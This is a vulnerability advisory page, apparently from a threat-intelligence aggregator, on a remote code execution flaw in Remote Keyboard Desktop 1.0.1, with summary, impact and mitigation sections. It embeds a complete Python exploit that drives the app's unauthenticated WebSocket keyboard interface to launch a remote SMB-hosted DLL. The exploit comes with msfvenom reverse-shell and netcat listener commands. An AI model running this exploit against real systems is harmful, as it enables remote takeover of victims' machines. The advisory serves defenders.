Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
AI Analysis
Technical Summary
Remote Keyboard Desktop version 1.0.1 contains a critical remote code execution (RCE) vulnerability that allows an attacker to execute arbitrary code on the target Windows system remotely. The exploit leverages the application's WebSocket interface, which listens on port 8080, to send crafted keyboard events that simulate user input. By sending a sequence of key presses, the attacker can invoke the Windows Run dialog and execute a malicious payload hosted on a remote SMB share. The exploit uses the Windows rundll32.exe utility to load and execute a DLL payload from the attacker's SMB server. The provided exploit code is written in Python 3 and uses the websocket-client library to connect to the target's WebSocket server. It sends keyboard events encoded as JSON messages to simulate typing the command to run the payload. The payload itself is generated using msfvenom to create a reverse shell DLL, which connects back to the attacker’s machine, providing full remote shell access. The exploit requires no authentication or user interaction beyond the vulnerable service running and listening on the target machine. The vulnerability arises because the Remote Keyboard Desktop application accepts and processes WebSocket messages that control keyboard input without proper authentication or input validation, allowing an attacker to remotely control the keyboard and execute arbitrary commands. No official patches or vendor mitigations are currently available, and no known exploits have been observed in the wild yet. The vulnerability affects Windows 10 Pro Build 19045 as tested, but likely impacts other Windows versions where the software is installed. The attack surface includes any exposed Remote Keyboard Desktop WebSocket interface, typically on port 8080. The exploit requires the attacker to host a malicious payload on an SMB share accessible to the victim machine, which is then executed via rundll32.exe. This attack vector can bypass many traditional defenses since it simulates legitimate keyboard input over a WebSocket connection.
Potential Impact
For European organizations, this vulnerability poses a significant risk due to the potential for full system compromise via remote code execution. Attackers can gain unauthorized remote shell access, enabling data theft, lateral movement, installation of persistent malware, ransomware deployment, or disruption of critical services. Organizations using Remote Keyboard Desktop for remote control or accessibility purposes may have this service exposed internally or externally, increasing the attack surface. The ability to execute arbitrary code without authentication means that any exposed instance is vulnerable to automated scanning and exploitation once the exploit code becomes widely available. This could lead to breaches of sensitive personal data protected under GDPR, intellectual property theft, and operational downtime. Critical infrastructure, healthcare, finance, and government sectors in Europe could be targeted due to the strategic value of such systems. The lack of patches and the presence of public exploit code heighten the urgency for mitigation. The attack’s reliance on SMB shares may be mitigated in segmented networks but remains a concern in environments with lax network segmentation or SMB exposure. Overall, the vulnerability threatens confidentiality, integrity, and availability of affected systems and could facilitate large-scale cyberattacks against European enterprises.
Mitigation Recommendations
1. Immediately identify and inventory all instances of Remote Keyboard Desktop 1.0.1 within the organization’s network. 2. Restrict network access to the WebSocket port (default 8080) using firewall rules, allowing only trusted hosts or internal management networks. 3. Disable or uninstall Remote Keyboard Desktop if it is not essential. 4. If the application must be used, isolate it in a segmented network zone with no SMB access to untrusted hosts. 5. Monitor network traffic for unusual SMB connections or WebSocket activity to detect exploitation attempts. 6. Employ endpoint detection and response (EDR) solutions to detect execution of rundll32.exe with suspicious remote DLL paths. 7. Implement strict SMB share access controls and disable SMBv1 where possible to reduce SMB attack surface. 8. Educate IT staff about this vulnerability and the risks of exposing remote control services without authentication. 9. Regularly update and patch all software components and monitor vendor channels for any forthcoming patches or mitigations. 10. Consider deploying network intrusion detection systems (NIDS) with signatures for this exploit’s WebSocket traffic patterns. These measures go beyond generic advice by focusing on network segmentation, access control, and behavioral monitoring specific to the attack vector used.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Belgium, Sweden, Finland
Indicators of Compromise
- exploit-code: # Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) # Date: 05/17/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://remotecontrolio.web.app/ # Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare # Version: 1.0.1 # Tested on: Windows 10 Pro Build 19045 # Start Remote Keyboard Desktop on your windows # Preparing: # # 1. Generating payload (dll/exe): # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll # 2. Start smb server: impacket-smbserver SHARE . -smb2support # 3. nc -lnvp 8080 # 4. python exploit.py ##### #!/usr/bin/env python3 import websocket import json import time target = "192.168.8.105" lhost = "192.168.8.101" WS_URL = f"ws://{target}:8080/" payload = "shell2.dll" # payload dll/exe filename debug = False HEADER_LIST = [ "User-Agent: Dart/3.7 (dart:io)", f"Origin: http://{target}:8080", "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits" ] #SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll based special_mapping = { ' ': ("SPACE", False), '/': ("NUMPAD_DIVIDE", False), '\\': ("\\", False), '.': ("NUMPAD_DECIMAL", False), ',': (",", False), } def send_key_event(ws, key, key_down): event = {"command": "keyboard_event", "data": {"key": key, "keyDown": key_down, "capsLock": False}} ws.send(json.dumps(event)) def send_text(ws, text, delay=0.05): shift_pressed = False for ch in text: if ch in special_mapping: key_name, need_shift = special_mapping[ch] elif ch.isalpha(): need_shift = ch.isupper() key_name = ch.upper() elif ch.isdigit(): key_name = ch need_shift = False else: raise ValueError(f"No key mapping for character: {ch!r}") if need_shift and not shift_pressed: send_key_event(ws, "SHIFT", True) shift_pressed = True elif not need_shift and shift_pressed: send_key_event(ws, "SHIFT", False) shift_pressed = False send_key_event(ws, key_name, True) send_key_event(ws, key_name, False) time.sleep(delay) if shift_pressed: send_key_event(ws, "SHIFT", False) def send_key(ws, keys, delay=0.05): for key in keys: send_key_event(ws, key, True) time.sleep(delay) for key in reversed(keys): send_key_event(ws, key, False) def on_open(ws): print ("Let's start!") send_key(ws, ["LEFT_WINDOWS", "R"]) time.sleep(0.5) send_text(ws, SMB_PATH) send_key(ws, ["RETURN"]) print ("Executing...") time.sleep(1.2) print("Check your listener!") if debug: print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m ") ws.close() def on_message(ws, message): if debug: print("[=] Received:", message) def on_error(ws, error): if debug: print("[!] Error:", error) def on_close(ws, code, reason): if debug: print(f"[x] Closed: {code} - {reason}") if __name__ == "__main__": websocket.enableTrace(debug) ws = websocket.WebSocketApp( WS_URL, header=HEADER_LIST, on_open=on_open, on_message=on_message, on_error=on_error, on_close=on_close ) ws.run_forever()
Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
Description
Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
AI-Powered Analysis
Technical Analysis
Remote Keyboard Desktop version 1.0.1 contains a critical remote code execution (RCE) vulnerability that allows an attacker to execute arbitrary code on the target Windows system remotely. The exploit leverages the application's WebSocket interface, which listens on port 8080, to send crafted keyboard events that simulate user input. By sending a sequence of key presses, the attacker can invoke the Windows Run dialog and execute a malicious payload hosted on a remote SMB share. The exploit uses the Windows rundll32.exe utility to load and execute a DLL payload from the attacker's SMB server. The provided exploit code is written in Python 3 and uses the websocket-client library to connect to the target's WebSocket server. It sends keyboard events encoded as JSON messages to simulate typing the command to run the payload. The payload itself is generated using msfvenom to create a reverse shell DLL, which connects back to the attacker’s machine, providing full remote shell access. The exploit requires no authentication or user interaction beyond the vulnerable service running and listening on the target machine. The vulnerability arises because the Remote Keyboard Desktop application accepts and processes WebSocket messages that control keyboard input without proper authentication or input validation, allowing an attacker to remotely control the keyboard and execute arbitrary commands. No official patches or vendor mitigations are currently available, and no known exploits have been observed in the wild yet. The vulnerability affects Windows 10 Pro Build 19045 as tested, but likely impacts other Windows versions where the software is installed. The attack surface includes any exposed Remote Keyboard Desktop WebSocket interface, typically on port 8080. The exploit requires the attacker to host a malicious payload on an SMB share accessible to the victim machine, which is then executed via rundll32.exe. This attack vector can bypass many traditional defenses since it simulates legitimate keyboard input over a WebSocket connection.
Potential Impact
For European organizations, this vulnerability poses a significant risk due to the potential for full system compromise via remote code execution. Attackers can gain unauthorized remote shell access, enabling data theft, lateral movement, installation of persistent malware, ransomware deployment, or disruption of critical services. Organizations using Remote Keyboard Desktop for remote control or accessibility purposes may have this service exposed internally or externally, increasing the attack surface. The ability to execute arbitrary code without authentication means that any exposed instance is vulnerable to automated scanning and exploitation once the exploit code becomes widely available. This could lead to breaches of sensitive personal data protected under GDPR, intellectual property theft, and operational downtime. Critical infrastructure, healthcare, finance, and government sectors in Europe could be targeted due to the strategic value of such systems. The lack of patches and the presence of public exploit code heighten the urgency for mitigation. The attack’s reliance on SMB shares may be mitigated in segmented networks but remains a concern in environments with lax network segmentation or SMB exposure. Overall, the vulnerability threatens confidentiality, integrity, and availability of affected systems and could facilitate large-scale cyberattacks against European enterprises.
Mitigation Recommendations
1. Immediately identify and inventory all instances of Remote Keyboard Desktop 1.0.1 within the organization’s network. 2. Restrict network access to the WebSocket port (default 8080) using firewall rules, allowing only trusted hosts or internal management networks. 3. Disable or uninstall Remote Keyboard Desktop if it is not essential. 4. If the application must be used, isolate it in a segmented network zone with no SMB access to untrusted hosts. 5. Monitor network traffic for unusual SMB connections or WebSocket activity to detect exploitation attempts. 6. Employ endpoint detection and response (EDR) solutions to detect execution of rundll32.exe with suspicious remote DLL paths. 7. Implement strict SMB share access controls and disable SMBv1 where possible to reduce SMB attack surface. 8. Educate IT staff about this vulnerability and the risks of exposing remote control services without authentication. 9. Regularly update and patch all software components and monitor vendor channels for any forthcoming patches or mitigations. 10. Consider deploying network intrusion detection systems (NIDS) with signatures for this exploit’s WebSocket traffic patterns. These measures go beyond generic advice by focusing on network segmentation, access control, and behavioral monitoring specific to the attack vector used.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52299
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) # Date: 05/17/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://remotecontrolio.web.app/ # Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare # Version: 1.0.1 # Tested on: Windows 10 Pro Build 19045 # Start Remote Keyboard Desktop on your windows # Preparing: # # 1. Generating payload (dll/exe): # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=80... (2952 more characters)
Threat ID: 68489dc67e6d765d51d532bc
Added to database: 6/10/2025, 9:04:06 PM
Last enriched: 6/11/2025, 8:24:31 AM
Last updated: 8/16/2025, 4:47:19 PM
Views: 20
Related Threats
Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems
HighElastic rejects claims of a zero-day RCE flaw in Defend EDR
CriticalEnumerating AWS the quiet way: CloudTrail-free discovery with Resource Explorer | Datadog Security Labs
MediumHow We Exploited CodeRabbit: From a Simple PR to RCE and Write Access on 1M Repositories
MediumTrivial C# Random Exploitation
HighActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.